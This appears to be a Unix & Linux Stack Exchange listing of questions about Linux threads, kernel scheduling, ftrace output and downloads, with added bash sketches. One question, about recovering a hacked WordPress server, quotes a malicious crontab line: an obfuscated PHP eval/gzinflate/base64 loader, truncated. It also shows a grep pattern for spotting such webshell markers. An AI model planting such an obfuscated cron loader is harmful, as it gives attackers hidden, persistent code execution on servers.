Unix & Linux Stack Exchange

Q&A for users of Linux, FreeBSD and other Unix-like operating systems

Latest Questions

0 votes

0 answers

49 views

Do linux kernel threads run in process context?

linux-kernel kernel-modules interrupt thread irq

I'm aware that Linux softirqs **may** run in the context of specific per-CPU kernel threads: ksoftirqd/[cpu_id].

Kernel threads are similar to user-space threads; however, they only execute kernel code in kernel mode (they don't have user-mode stacks).

Suppose that, at a given point in time, a ksoftirqd kernel thread is running a softirq (i.e. deferred work from a top-half interrupt handler). As far as I know, kernel threads share the virtual address range to which kernel code (including loaded kernel modules) is mapped.

What would happen if the softirq bottom-half kernel code attempted to access a virtual address (VA) within the user-space VA range? I'm not sure an error would actually occur, but I believe the result of such an access would be unpredictable.

Does this make sense? Thanks.

BTW, I ran the following trace-cmd commands to dig into some details:

    root@eve-ng62-28:~# trace-cmd start -e net:netif_receive_skb_entry
    root@eve-ng62-28:~# trace-cmd show
    # tracer: nop
    #
    # entries-in-buffer/entries-written: 2/2   #P:48
    #
    #                                _-----=> irqs-off/BH-disabled
    #                               / _----=> need-resched
    #                              | / _---=> hardirq/softirq
    #                              || / _--=> preempt-depth
    #                              ||| / _-=> migrate-disable
    #                              |||| /     delay
    #           TASK-PID     CPU#  |||||  TIMESTAMP  FUNCTION
    #              | |         |   |||||     |         |
     qemu-system-x86-2064265  b.... 599782.975041: netif_receive_skb_entry: dev=vunl0_2_0 napi_id=0x0 queue_mapping=1 skbaddr=00000000b36764b3 vlan_tagged=0 vlan_proto=0x0000 vlan_tci=0x0000 protocol=0x0800 ip_summed=0 hash=0x00000000 l4_hash=0 len=84 data_len=0 truesize=768 mac_header_valid=1 mac_header=-14 nr_frags=0 gso_size=0 gso_type=0x0
     qemu-system-x86-2064265  b.... 599783.973971: netif_receive_skb_entry: dev=vunl0_2_0 napi_id=0x0 queue_mapping=1 skbaddr=00000000dd8af289 vlan_tagged=0 vlan_proto=0x0000 vlan_tci=0x0000 protocol=0x0800 ip_summed=0 hash=0x00000000 l4_hash=0 len=84 data_len=0 truesize=768 mac_header_valid=1 mac_header=-14 nr_frags=0 gso_size=0 gso_type=0x0


As you can see, the netif_receive_skb_entry tracepoint within the netif_receive_skb() kernel function is triggered. It has the value b in the irqs-off/BH-disabled field. Does that mean netif_receive_skb() is actually running within a softirq, with bottom halves (BH) disabled?
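To help read that header, here is a small bash sketch that decodes the five-character flags column (such as `b....`). The letter meanings follow my reading of the kernel's ftrace documentation for recent kernels; older kernels print fewer letters in the first column, so treat the mapping as an assumption to check against `Documentation/trace/ftrace.rst` for your kernel. `decode_trace_flags` is a hypothetical helper name.

```shell
#!/usr/bin/env bash
# Decode the 5-character latency-format flags column printed by ftrace /
# trace-cmd (e.g. "b...."). Letter meanings are assumed from the ftrace
# documentation of recent kernels; verify them for your kernel version.
decode_trace_flags() {
    local f=$1
    local irq=${f:0:1} resched=${f:1:1} ctx=${f:2:1} preempt=${f:3:1} migrate=${f:4:1}

    case $irq in
        D) echo "irqs-off/BH: IRQs and bottom halves disabled" ;;
        d) echo "irqs-off/BH: IRQs disabled" ;;
        b) echo "irqs-off/BH: bottom halves disabled" ;;
        X) echo "irqs-off/BH: IRQ flags not readable on this arch" ;;
        *) echo "irqs-off/BH: neither disabled" ;;
    esac
    case $resched in
        N) echo "need-resched: TIF_NEED_RESCHED and PREEMPT_NEED_RESCHED set" ;;
        n) echo "need-resched: TIF_NEED_RESCHED set" ;;
        p) echo "need-resched: PREEMPT_NEED_RESCHED set" ;;
        .) echo "need-resched: not set" ;;
        *) echo "need-resched: other ($resched)" ;;
    esac
    case $ctx in
        Z) echo "context: NMI inside hardirq" ;;
        z) echo "context: NMI" ;;
        H) echo "context: hardirq inside softirq" ;;
        h) echo "context: hardirq" ;;
        s) echo "context: softirq" ;;
        *) echo "context: normal (not hardirq/softirq/NMI)" ;;
    esac
    # For the two counters, '.' stands for 0.
    echo "preempt-depth: ${preempt/./0}"
    echo "migrate-disable: ${migrate/./0}"
}
```

Under that reading, `decode_trace_flags 'b....'` reports bottom halves disabled, a normal (non-softirq) context in the third column, and both counters at zero.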
                                

CarloC (385 rep)

Jul 16, 2025, 12:11 PM • Last activity: Jul 16, 2025, 06:19 PM

2 votes

2 answers

4389 views

How to find out on which core a thread is running on?

process cpu proc multithreading thread

Let's say we have a CPU-intensive application called multi-threaded-application.out that is running on top of Ubuntu with a PID of 10000. It has 4 threads with TIDs 10001, 10002, 10003, and 10004. I want to know, at any given time, on which core each of these threads is being scheduled.

I tried /proc/<pid>/task/<tid>/status, but I couldn't find any information about the ID of the core that is running the given thread.

This question is somewhat related to this one.

Any help would be much appreciated.
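For reference, one way to see this, sketched in bash under the assumption that proc(5) describes your kernel: field 39 (`processor`, the CPU the task last executed on) of `/proc/<pid>/task/<tid>/stat` holds the core number. `ps -L -o tid=,psr=,comm= -p <pid>` shows the same value in its `psr` column. The function name `thread_cpus` is illustrative.

```shell
#!/usr/bin/env bash
# Print "TID CPU" for each thread of a process. CPU is field 39 of
# /proc/<pid>/task/<tid>/stat ("processor": CPU last executed on, see proc(5)).
thread_cpus() {
    local pid=$1 task stat rest
    local -a f
    for task in /proc/"$pid"/task/[0-9]*; do
        # The thread may exit between the glob and the read; skip it if so.
        stat=$(cat "$task/stat" 2>/dev/null) || continue
        # Field 2 (comm) is parenthesised and may contain spaces or ")",
        # so drop everything up to the last ") " before splitting.
        rest=${stat##*") "}
        read -r -a f <<< "$rest"
        # f[0] is field 3 (state), so field 39 is f[36].
        printf '%s %s\n' "${task##*/}" "${f[36]}"
    done
}
```

`thread_cpus 10000` would print one line per thread. The value is only a snapshot: unless the thread's affinity is pinned, the scheduler may migrate it right after it is read.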

Michel Gokan Khan (133 rep)

Sep 5, 2020, 05:20 PM • Last activity: Jul 14, 2025, 06:02 PM

0 votes

2 answers

82 views

Troj/PHPShel-CE and PHP/Agent-BJNA trojan

ubuntu apache-httpd php thread wordpress

I'm currently dealing with a real threat: the trojans Troj/PHPShel-CE and PHP/Agent-BJNA showed up on my system. I've decided to move to another provider – the first server IP was already blacklisted, and I want to stop any further damage.

As a first step, I disabled apache2 and blocked all incoming/outgoing ports except SSH (port 22). I'm now backing up only the important data (like .pdf, images, etc. – no .php, .exe, .com or anything executable).

But I'm still confused why Sophos didn’t detect the full extent of the infection. Here's what it found:

    Severity,When,Event,User,"User Groups",Device,"Device Groups","IP Address"
    Low,"2025-05-30T22:51:14+02:00","Scan 'Scan Now' completed",n/a,,mail,,xx.xx.xx.xx
    High,"2025-05-30T22:39:03+02:00","Outbreak detected",n/a,,mail,,xx.xx.xx.xx
    Medium,"2025-05-30T22:39:02+02:00","Malware detected: 'Troj/PHPShel-CE' at '/var/www/clients/client1/web7/web/wp-includes/l10n/class-wp-translation-file-security.php'",n/a,,mail,,xx.xx.xx.xx
    Low,"2025-05-30T22:38:45+02:00","Malware cleaned up: 'PHP/Agent-BJNA' at '/var/www/clients/client1/web3/web/wp-content/plugins/wpforms-lite/vendor_prefixed/apimatic/jsonmapper/tests/namespacetest/model/.1748559585'",n/a,,mail,,xx.xx.xx.xx
    more... about 150 times...

After scanning multiple times, some of the same files were detected again – so clearly something is still active.

I chatted with Claude (AI assistant), and he suggested checking all user crontabs, using this:

    echo "Checking crontabs..."
    for user in $(cut -f1 -d: /etc/passwd); do 
        echo "--- Crontab for $user ---"
        crontab -u "$user" -l 2>/dev/null || echo "No crontab for $user"
    done

At first, nothing suspicious came up – but then I found something under a user called web10:

    root@mail:/usr/local/sbin# crontab -u web10 -l
    * * * * * /usr/bin/php -r 'eval(gzinflate(base64_decode("jVJtj5pAEP7**** LOT MORE ****==")));

###### My question:

When we move to a new (managed) hosting provider, is there a risk that some infected files could sneak into the new system during the migration – even if we’re careful and avoid transferring obvious malware like .php and .exe files?

###### My setup:

Ubuntu 24.04.2, apache2, php 8.3/8.4, ispconfig3
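On the migration risk, one observation: filtering by extension alone is weak, since PHP code can be appended to a file named `.jpg`, or hidden in a dotfile like the `.1748559585` file in the Sophos log. A minimal bash sketch that lists files under a backup directory containing common PHP/webshell markers regardless of their names, plus hidden files, could look like this. The marker list is a heuristic assumption, not a complete signature set, and an empty result does not prove the data is clean. Both function names are hypothetical.

```shell
#!/usr/bin/env bash
# List files under a directory that contain common PHP / webshell markers,
# whatever their extension. Heuristic only: the patterns are assumptions.
scan_backup() {
    local dir=$1
    # -r recurse, -l print file names only, -a treat binary files as text
    # (so PHP appended to an image is still found), -E extended regex.
    grep -rlaE '<\?php|eval\(|base64_decode\(|gzinflate\(' -- "$dir"
}

# List hidden files, such as the dotfile Sophos flagged in the log above.
list_hidden_files() {
    find "$1" -type f -name '.*'
}
```

For example, run `scan_backup /path/to/backup` and `list_hidden_files /path/to/backup` before copying anything to the new provider, and inspect every hit by hand.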

Harvey68 (1 rep)

Jun 1, 2025, 09:23 AM • Last activity: Jun 3, 2025, 08:44 AM

3 votes

1 answers

871 views

How do you fetch a large file over http in parallel?

wget http parallelism bandwidth thread

**Question:**

Since HTTP supports resuming at an offset, are there any tools (or existing options for commands like wget or curl) that will launch multiple threads to fetch the file in parallel, with multiple requests at different file offsets? This could help performance if each socket is throttled separately.

I could write a program to do this, but I'm wondering if the tooling already exists.

**Background:**

Recently I wanted to download a large ISO, **but!** ... Somewhere between the server and my internet provider, the transfer rate was limited to 100 kilobits per second! However, I noticed that the first 5 to 10 seconds had great throughput, hundreds of megabits per second. So I wrote a small bash script to restart the download after a few seconds:

    while ! timeout 8 wget -c http://example.com/bigfile.iso ; do true; done

(I hope it was not my provider . . . But maybe it was. Someone please bring back net neutrality!)
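Existing tools do this, for example `aria2c` (its `-x` and `-s` options set connections per server and the number of pieces) or `axel -n <connections>`. To illustrate the mechanism, here is a minimal bash sketch using plain `curl`: it reads `Content-Length`, splits the file into N byte ranges, fetches each range with `--range` in a background job, checks each part's size, and concatenates the parts. It assumes the server honours HTTP range requests and reports `Content-Length`; `split_ranges` and `parallel_fetch` are hypothetical helper names.

```shell
#!/usr/bin/env bash
# Print N inclusive byte ranges ("start-end") that together cover SIZE bytes.
split_ranges() {
    local size=$1 n=$2 chunk start end
    chunk=$(( (size + n - 1) / n ))            # ceiling division
    for (( start = 0; start < size; start += chunk )); do
        end=$(( start + chunk - 1 ))
        if (( end >= size )); then end=$(( size - 1 )); fi
        echo "$start-$end"
    done
}

# Fetch URL into OUT with N parallel HTTP range requests (default 4).
# Assumes the server supports Range requests and sends Content-Length.
parallel_fetch() {
    local url=$1 out=$2 n=${3:-4} size i r
    local -a ranges pids
    # Last Content-Length seen, after any redirects; "+ 0" drops the trailing CR.
    size=$(curl -sIL "$url" |
           awk 'tolower($1) == "content-length:" { len = $2 } END { print len + 0 }')
    if (( size <= 0 )); then echo "no Content-Length from server" >&2; return 1; fi

    mapfile -t ranges < <(split_ranges "$size" "$n")
    for i in "${!ranges[@]}"; do
        # -f: fail on HTTP errors; each range uses its own connection.
        curl -sfL --range "${ranges[i]}" -o "$out.part$i" "$url" &
        pids[i]=$!
    done
    for i in "${!ranges[@]}"; do
        wait "${pids[i]}" || { echo "part $i failed" >&2; return 1; }
        r=${ranges[i]}
        # A server that ignores Range replies 200 with the whole file.
        if [ "$(wc -c < "$out.part$i")" -ne $(( ${r#*-} - ${r%-*} + 1 )) ]; then
            echo "part $i has the wrong size" >&2; return 1
        fi
    done
    for i in "${!ranges[@]}"; do cat "$out.part$i"; done > "$out"
    for i in "${!ranges[@]}"; do rm -f "$out.part$i"; done
}
```

Usage would be `parallel_fetch http://example.com/bigfile.iso bigfile.iso 8`. Whether it helps depends on the throttling really being per connection.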

KJ7LNW (525 rep)

Feb 3, 2023, 01:28 AM • Last activity: May 9, 2025, 08:03 PM

1 votes

1 answers

3018 views

What types of threads does Java/JVM use from Linux OS's perspective?

linux java multithreading thread

A developer friend of mine recently asked the question: On a Linux system when a Java application runs which has threads, how do these threads appear to the underlying Linux OS?

So what are Java threads?

slm (378955 rep)

Oct 26, 2019, 04:03 AM • Last activity: May 6, 2025, 04:03 PM

2 votes

1 answers

153 views

What is a parked thread in Linux kernel?

linux-kernel scheduling thread wait

What is a parked thread in the context of the Linux kernel? I mean a thread that is in the TASK_PARKED state.

How does this state differ from TASK_INTERRUPTIBLE and TASK_UNINTERRUPTIBLE?

From which state can a thread be woken faster? In general, and in the particular case of using kthread_parkme / kthread_unpark for waiting instead of [s]wait_event_... / [s]wake_up_...?

I know that waitqueues support multiple waiters, but I am interested only in a single sleeper/waker pair.

Andrey Pro (179 rep)

Apr 19, 2025, 01:34 PM • Last activity: Apr 23, 2025, 11:24 AM

4 votes

2 answers

2787 views

API Monitoring and Hooking

process monitoring malware thread api

I am currently reading the "Malware Analyst's Cookbook and DVD". It has a chapter called "Dynamic Analysis" with some recipes about hooking and monitoring the API calls of a process, but they are for Windows.

I want to do the same thing that recipe 9-10 explains, but for Linux. Recipe 9-10 is called "Capturing Process, Thread, and Image Load Events".
This recipe shows "how to implement a driver that alerts you when any events occur on the system while your malware sample executes". It uses the API functions of the Windows Driver Kit (WDK) to call a user-defined callback function. It uses these callback functions:

- Process creation callback function called PsSetCreateProcessNotifyRoutine(...)
- Thread creation callback function called PsSetCreateThreadNotifyRoutine(...)
- Image load callback function called PsSetLoadImageNotifyRoutine(...).

When any events occur, it displays them as debug messages, which can then be viewed in e.g. DebugView.

This seems well documented for Windows and it is easy to find information about it, but I am having trouble finding information for Linux.

I've found some general introductions to drivers and one for hooking, but I still haven't found any that are more specific, or at least more focused on malware analysis.

I would appreciate tips for further reading or recommended tutorials on this topic.
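One user-space approximation on Linux, offered as a sketch rather than a driver-level equivalent of the WDK callbacks: run the sample under `strace -f` and filter the log for task creation (`clone`, `fork`, `vfork`; `pthread_create` also ends in `clone`), program execution (`execve`), and shared-library loads (the dynamic loader `openat`s each `.so` before mapping it). strace is visible to the traced program, so a sample may detect it. For system-wide, kernel-side events, the `sched:sched_process_fork`, `sched:sched_process_exec` and `sched:sched_process_exit` tracepoints (usable with trace-cmd) are another option. The helper names below are hypothetical.

```shell
#!/usr/bin/env bash
# Run a program under strace, following forks/threads (-f), with timestamps,
# logging the "process" syscall class (clone, fork, execve, exit, ...) and openat.
trace_sample() {
    local log=$1; shift
    strace -f -tt -o "$log" -e trace=process,openat "$@"
}

# From such a log, keep task creation, exec, and successful .so opens
# (the dynamic loader opens each shared library before mmap()ing it).
summarize_events() {
    grep -E '(clone3?|v?fork|execve)\(|openat\(.*\.so(\.[0-9]+)*".*\) = [0-9]+$' "$1"
}
```

For example: `trace_sample /tmp/sample.log ./sample`, then `summarize_events /tmp/sample.log`.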

Greeneco (401 rep)

Sep 8, 2014, 07:08 PM • Last activity: Apr 17, 2025, 05:08 PM

1 votes

1 answers

69 views

Hit strange signal settings of a kernel thread in Linux

linux linux-kernel process signals thread

I am working on an embedded Linux system (kernel 5.10.24), using busybox as init. I have hit a strange problem with the signal settings of a kernel thread. The kernel thread comes from a device driver, and with cat /proc/pid/status I found that its signal settings are as follows:

    SigQ:   0/31126
    SigPnd: 0000000000000000
    ShdPnd: 0000000000004000
    SigBlk: 0000000000000000
    SigIgn: ffffffffffffbfff
    SigCgt: 0000000000004000

Other kernel threads have 0xffffffffffffffff in SigIgn. This kernel thread is started with kthread_run(), as the other threads are. The SigCgt and ShdPnd settings keep the kernel thread from entering a waiting state; instead, it is now busy-looping on down_interruptible. So I am wondering: are this kernel thread's signal settings correct? Where are the signal settings for a kernel thread configured, and is it possible for me to customize them? If so, how?
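To read those masks: each is a 64-bit hex bitmap in which bit n-1 stands for signal n. A small bash sketch (the function name is made up) that decodes one, processing the string one hex digit at a time so that no 64-bit shell arithmetic can overflow:

```shell
#!/usr/bin/env bash
# Decode a /proc/<pid>/status signal mask (SigPnd, ShdPnd, SigBlk, SigIgn,
# SigCgt) into signal numbers: bit n-1 set means signal n is in the set.
# Works one hex digit at a time, so there is no 64-bit overflow.
decode_sigmask() {
    local hex=${1#0x} i d b n
    local -a sigs=()
    n=${#hex}
    for (( i = 0; i < n; i++ )); do
        d=$(( 16#${hex:n-1-i:1} ))        # i-th hex digit from the right
        for (( b = 0; b < 4; b++ )); do
            if (( (d >> b) & 1 )); then
                sigs+=( $(( i * 4 + b + 1 )) )
            fi
        done
    done
    echo "${sigs[*]}"
}
```

Applied to the values above, `decode_sigmask 0000000000004000` prints `15` and `kill -l 15` prints `TERM`, so SigCgt and ShdPnd both refer to SIGTERM, while `decode_sigmask ffffffffffffbfff` lists every signal from 1 to 64 except 15.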

wangt13 (631 rep)

Dec 23, 2024, 11:40 AM • Last activity: Dec 24, 2024, 03:16 AM

12 votes

1 answers

10189 views

Get PID from TID

ps thread pthreads

I run [iotop](http://guichaz.free.fr/iotop/) to check on programs that are heavy disk users, in case I need to decrease their priority. Usually this is good enough, but iotop only shows thread ID (TID), and sometimes I want to know process ID (PID) so I can find out more about which process is responsible.

Unfortunately, while ps can display TID (a.k.a SPID, LWP), it doesn't have a flag to take a list of TIDs the way it does for a list of PIDs with --pid. The best I can do is list TIDs and then grep the output. For example, if the thread id is 792, I can do

    $ ps -eLf | grep ' 792 '

which works reasonably well, but is a little inelegant.

Is there a better way?
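One alternative, sketched in bash: every thread has a `/proc/<tid>` directory, even though TIDs of non-leader threads are not listed by `ls /proc`, and its `status` file contains a `Tgid:` line holding the PID of the owning process. `tgid_of` is a hypothetical helper name.

```shell
#!/usr/bin/env bash
# For each TID given, print "TID PID", where PID is the thread group ID
# taken from the Tgid: line of /proc/<tid>/status.
tgid_of() {
    local tid
    for tid in "$@"; do
        # /proc/<tid> is not listed by `ls /proc` for non-leader threads,
        # but it can still be opened directly.
        if [ -r "/proc/$tid/status" ]; then
            awk -v tid="$tid" '$1 == "Tgid:" { print tid, $2; exit }' "/proc/$tid/status"
        else
            echo "$tid: no such thread" >&2
        fi
    done
}
```

`tgid_of 792` would print `792` followed by the owning PID, which can then be passed to `ps -p <pid> -o pid,comm,args`.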

Nathaniel M. Beaver (1398 rep)

Mar 15, 2018, 04:35 PM • Last activity: Dec 18, 2024, 06:00 AM

4 votes

3 answers

13490 views

How can I get information about threads of process?

ubuntu process thread

I wanted to get information about the threads of a process. I used the /proc/stat command in the terminal but I get a "permission denied" error. How can I resolve this issue?
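Note that `/proc/stat` is a read-only text file, not a command; typing it at the prompt makes the shell try to execute a file without execute permission, which yields exactly a "permission denied" error. Per-thread information lives in files under `/proc/<pid>/task/<tid>/` that can be read instead. A short bash sketch (the function name is invented) that prints the thread count and each thread's TID, state and name; `ps -T -p <pid>` and `top -H -p <pid>` give similar views.

```shell
#!/usr/bin/env bash
# Print the thread count, then "TID STATE NAME" for every thread of a process,
# by reading (not executing) /proc/<pid>/status and /proc/<pid>/task/<tid>/status.
thread_info() {
    local pid=$1 task
    grep '^Threads:' "/proc/$pid/status"
    for task in /proc/"$pid"/task/[0-9]*; do
        [ -r "$task/status" ] || continue
        awk -v tid="${task##*/}" '
            /^Name:/  { sub(/^Name:[ \t]+/, ""); name = $0 }
            /^State:/ { state = $2 }
            END       { print tid, state, name }' "$task/status"
    done
}
```

For example, `thread_info 1234` lists every thread of process 1234.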

                                

The Capricorn (61 rep)

Jul 11, 2017, 06:11 AM • Last activity: Jul 23, 2024, 08:00 PM

1 votes

1 answers

246 views

Why can't Linux provide lighter/green threads?

thread

I often hear that Linux threads are heavy (requiring an 8 MB stack) and that this is why languages like golang implement their own green threads in user space (allocating their stacks on the heap). This then allows handling, say, 100k connections instead of 10k. As I understand it, one problem with this is interop with C, and that is why Rust moved away from them and went with async/await.

But if green threads are so popular, why can't Linux provide its own extremely lightweight threads? In other words, why does every language need its own complex thread scheduler on top of the OS scheduler, when the OS seems better placed to make these scheduling decisions?

flippanthomework (13 rep)

May 26, 2024, 05:56 PM • Last activity: May 26, 2024, 06:24 PM

271 votes

3 answers

147592 views

Why does `htop` show more processes than `ps`?

process ps top htop thread

In ps xf:

    26395 pts/78   Ss     0:00  \_ bash
    27016 pts/78   Sl+    0:04  |   \_ unicorn_rails master -c config/unicorn.rb
    27042 pts/78   Sl+    0:00  |       \_ unicorn_rails worker[0] -c config/unicorn.rb

In htop, it shows up as multiple unicorn_rails lines (screenshot not preserved).

Why does htop show more processes than ps?

Cheng (6801 rep)

Mar 31, 2011, 10:48 AM • Last activity: Feb 3, 2024, 04:18 AM

4 votes

2 answers

3352 views

Are there any benefits in setting a HDD's logical sector size to 4Kn?

hard-disk block-device multithreading thread

Modern HDDs are all "Advanced Format" drives, i.e. by default they report a logical/physical sector size of 512/4096.

By default, most Linux formatting tools use a block size of 4096 bytes (at least that's the default on Debian/EXT4).

Until today, I thought that this was more or less optimal: Linux/EXT4 sends chunks of 4K data to the HDD, which can handle them optimally, even though its logical sector size is 512 bytes.

But today I read this fairly recent (2021) post. The author ran some HDD benchmarks to check whether switching his HDD's logical sector size from 512e to 4Kn would improve performance. His conclusion:

> Remember: My theory going in was that the filesystem uses 4k blocks, and everything is properly aligned, so there shouldn’t be a meaningful difference.
>
> Does that hold up? Well, no. Not at all. (...) Using 4kb blocks… there’s an awfully big difference here. This is single threaded benchmarking, but there is consistently a huge lead going to the 4k sector drive here on 4kb block transfers.
> (...)
>
> **Conclusions: Use 4k Sectors!**
>
> As far as I’m concerned, the conclusions here are pretty clear. If you’ve got a modern operating system that can handle 4k sectors, and your drives support operating either as 512 byte or 4k sectors, convert your drives to 4k native sectors before doing anything else. Then go on your way and let the OS deal with it.

Basically, his conclusion was that switching the HDD's logical sector size to 4Kn gave quite a performance improvement over the out-of-the-box 512e.

Now, an important thing to note: that particular benchmark was single threaded. He also ran a 4-threaded benchmark, which didn't show any significant difference between 512e and 4Kn.

Thus my questions :

 - His conclusion holds up only if you have single threaded processes that read/write on the drive. Does Linux have such single threaded processes ?
 - And thus, would you recommend to set a HDD's logical sector size to 4Kn ?
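Before converting anything, it helps to know what each drive currently reports. A small bash sketch (hypothetical function name) that reads the sysfs attributes `queue/logical_block_size` and `queue/physical_block_size` for every block device; `blockdev --getss --getpbsz /dev/sdX` reports the same pair. The optional root-directory argument exists only so the function can be tried against a fake tree; it defaults to `/sys/block`. It only reads values and changes nothing.

```shell
#!/usr/bin/env bash
# Print "DEVICE LOGICAL PHYSICAL KIND" (sizes in bytes) for each block device,
# where KIND is 512e (512/4096), 4Kn (4096/4096), 512n (512/512) or other.
sector_sizes() {
    local root=${1:-/sys/block} dev l p kind
    for dev in "$root"/*; do
        [ -r "$dev/queue/logical_block_size" ] || continue
        l=$(<"$dev/queue/logical_block_size")
        p=$(<"$dev/queue/physical_block_size")
        case "$l/$p" in
            512/4096)  kind=512e ;;
            4096/4096) kind=4Kn ;;
            512/512)   kind=512n ;;
            *)         kind=other ;;
        esac
        echo "${dev##*/} $l $p $kind"
    done
}
```

On a typical Advanced Format drive, `sector_sizes` would show a line ending in `512 4096 512e`.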

ChennyStar (1969 rep)

Nov 13, 2023, 05:16 PM • Last activity: Nov 17, 2023, 02:21 PM

0 votes

1 answers

100 views

Why is the ulimit restriction affected by other processes?

linux process ulimit thread

I have some processes creating a large number of threads (using the Python ray module), like 32 (processes) * 120 (threads per process).

Then I found that other processes would fail to create threads even though their thread count (nTH) is actually small (like creating a new ssh localhost connection, or running top in another shell), far less than the typical NPROC limit of 4096 shown by ulimit -a.

I wonder whether ulimit is a user-scope or a process-scope restriction. If the latter, why would it be affected by other processes?
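For what it's worth, setrlimit(2) describes RLIMIT_NPROC (what `ulimit -u` sets) as a limit on the number of processes, or more precisely threads on Linux, for the real user ID of the caller, so threads of every process running as the same user count against it. A bash sketch (invented function name) that counts them from the `Uid:` lines of `/proc/*/task/*/status`, whose first field is the real UID:

```shell
#!/usr/bin/env bash
# Count threads whose real UID is $1 (default: the caller's), i.e. the
# number that RLIMIT_NPROC ("ulimit -u") is compared against on Linux.
threads_of_uid() {
    local uid=${1:-$(id -u)}
    # printf is a builtin, so the long glob cannot hit ARG_MAX; xargs batches
    # the paths for cat, and files of tasks that already exited are skipped.
    printf '%s\0' /proc/[0-9]*/task/[0-9]*/status |
        xargs -0 cat 2>/dev/null |
        awk -v uid="$uid" '$1 == "Uid:" && $2 == uid { n++ } END { print n + 0 }'
}
```

Comparing `threads_of_uid` with `ulimit -u` while the ray workers are running should show whether the per-user total is close to the limit.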

beantowel (1 rep)

Oct 30, 2023, 08:42 AM • Last activity: Oct 30, 2023, 08:57 AM

2 votes

1 answers

533 views

How can I locate the stacks of child tasks (threads) using /proc/<pid>/maps?

linux proc virtual-memory thread

PURPOSE: 
I am theorising as to how one would go about creating a pointer scanner in a Linux environment. 

DISCLAIMER:
My findings have been tested on Debian Bookworm (current stable) and a Gentoo system with a custom kernel. No differences have been observed. 

PROBLEM:
Without attaching debuggers to a target process, I want to be able to identify the VMA of the stack of each thread/child task. This should be achievable using the proc pseudo-filesystem.

DISCUSSION:

Prior to Linux 4.5, /proc/[parent_tid]/maps would label the parent task's stack region with [stack] in the pathname field, and label each child task's stack region with [stack:child_tid].

Since Linux 4.5, only the parent task's stack region keeps its [stack] label. Child task stack regions now have no label. In the commit message for this change (see link 1), Johannes Weiner states that child task stack VMAs can still be viewed by observing their process maps via /proc/[parent_tid]/task/[child_tid]/maps.

This has proven ineffective for me. The memory region maps are identical across parent and child tasks: /proc/[parent_tid]/maps ≡ /proc/[parent_tid]/task/[child_tid*]/maps. This ultimately means that the [stack] label is attached to the same region.

/proc/[tid]/stat can be used to find the VMA of the bottom of the stack for a given task. It is the 28th value (see man 5 proc). Once again, /proc/[parent_tid]/stat ≡ /proc/[parent_tid]/task/[child_tid*]/stat. Clearly the child task does not share the start of the stack with every other task in the process.

clone(2), the system call used to create new child tasks, takes a stack pointer as a parameter. The most obvious way to acquire memory for a stack is via an anonymous mmap(2). Anonymous memory maps do not have a label in /proc/[tid]/maps. From observing a few single threaded and multi-threaded processes, there is a direct correlation between the number of anonymous memory mappings and the threads of a program. While such mappings are used for more than thread stacks, I very much expect thread stacks to be allocated this way. Each memory mapping gets its own entry in /proc/[tid]/maps. Surely there is a way to determine which of these act as child task stacks?

*What am I getting wrong here?*
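As a starting point for the anonymous-mapping observation, a bash sketch (hypothetical function name) that lists the mappings in a maps file that have no pathname, with their sizes. It only filters; it does not decide which regions are thread stacks. One pattern worth checking, stated as an assumption based on how glibc usually allocates pthread stacks with `mmap` plus a `PROT_NONE` guard page, is an anonymous `rw-p` region directly preceded by a small `---p` region.

```shell
#!/usr/bin/env bash
# List anonymous mappings (no pathname, so exactly 5 fields) from a maps file
# as "START-END PERMS SIZE_KIB". Candidate thread stacks are among these.
anon_maps() {
    awk '
        # POSIX awk has no hex parsing, so convert by hand (exact below 2^53).
        function hex(s,   i, n) {
            n = 0; s = tolower(s)
            for (i = 1; i <= length(s); i++)
                n = n * 16 + index("0123456789abcdef", substr(s, i, 1)) - 1
            return n
        }
        NF == 5 {
            split($1, r, "-")
            printf "%s %s %.0f\n", $1, $2, (hex(r[2]) - hex(r[1])) / 1024
        }' "$1"
}
```

Usage: `anon_maps /proc/<pid>/maps`.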

RELATED LINKS:

1. Commit for removing the [STACK:tid] label from /proc/[tid]/maps:
https://lists.ubuntu.com/archives/kernel-team/2016-March/074681.html 

vykt (21 rep)

Oct 15, 2023, 04:12 AM • Last activity: Oct 15, 2023, 06:04 AM

3 votes

1 answers

1196 views

Why does Linux need both pid_max and threads-max?

linux-kernel process sysctl thread

I understand the difference between /proc/sys/kernel/pid_max and /proc/sys/kernel/threads-max. There's a good explanation in the answer to
[Understanding the differences between pid_max, ulimit -u and thread_max](https://unix.stackexchange.com/a/345052/273579):

> /proc/sys/kernel/pid_max has nothing to do with the maximum number
> of processes that can be run at any given time.  It is, in fact, the
> maximum numerical PROCESS IDENTIFIER than can be assigned by the
> kernel.
> 
> In the Linux kernel, a process and a thread are one and the same. 
> They're handled the same way by the kernel.  They both occupy a slot
> in the task_struct data structure.  A thread, by common terminology,
> is in Linux a process that shares resources with another process (they
> will also share a thread group ID).  A thread in the Linux kernel is
> largely a conceptual construct as far as the scheduler is concerned.
> 
> Now that you understand that the kernel largely does not differentiate
> between a thread and a process, it should make more sense that
> /proc/sys/kernel/threads-max is actually the maximum number of
> elements contained in the data structure task_struct.  Which is the
> data structure that contains the list of processes, or as they can be
> called, tasks.

However, effectively, both limit the maximum number of concurrent threads on a host. This number will be - to my understanding - the minimum of pid_max and threads-max. So why are both needed?

I understand that the default value of pid_max is [based on the number of possible CPUs](https://stackoverflow.com/a/39631072/8529284) of the machine, while the default of threads-max is derived from the [number of pages](https://stackoverflow.com/a/21926745/8529284). But since both have the same effect, couldn't Linux just have one value that would be the minimum of both?
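The premise can be checked directly on a given host. A tiny bash sketch (invented function name) that follows the question's own reasoning, reading both sysctls and printing the smaller value as the rough system-wide cap; it deliberately ignores per-user `ulimit -u` and any other limit. The optional directory argument defaults to `/proc/sys/kernel` and exists only for testing.

```shell
#!/usr/bin/env bash
# Print pid_max, threads-max and the smaller of the two, which the question
# argues is (roughly) the effective system-wide cap on concurrent tasks.
task_caps() {
    local dir=${1:-/proc/sys/kernel} pid_max threads_max
    pid_max=$(<"$dir/pid_max")
    threads_max=$(<"$dir/threads-max")
    echo "pid_max=$pid_max threads-max=$threads_max min=$(( pid_max < threads_max ? pid_max : threads_max ))"
}
```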
                                

aviro (6925 rep)

Sep 11, 2023, 12:47 PM • Last activity: Sep 11, 2023, 01:00 PM

16 votes

3 answers

18021 views

How to kill an individual thread under a process in linux?

linux kill thread

                                  
These are the individual threads of the Packet Receiver process (screenshot not preserved). Is there any way to kill an individual thread? Does Linux provide any specific command that can kill, or send a stop signal to, a particular thread within a process?

Md. Kawsaruzzaman (165 rep)

Nov 12, 2017, 05:27 AM • Last activity: Aug 30, 2023, 03:57 PM

62 votes

4 answers

98942 views

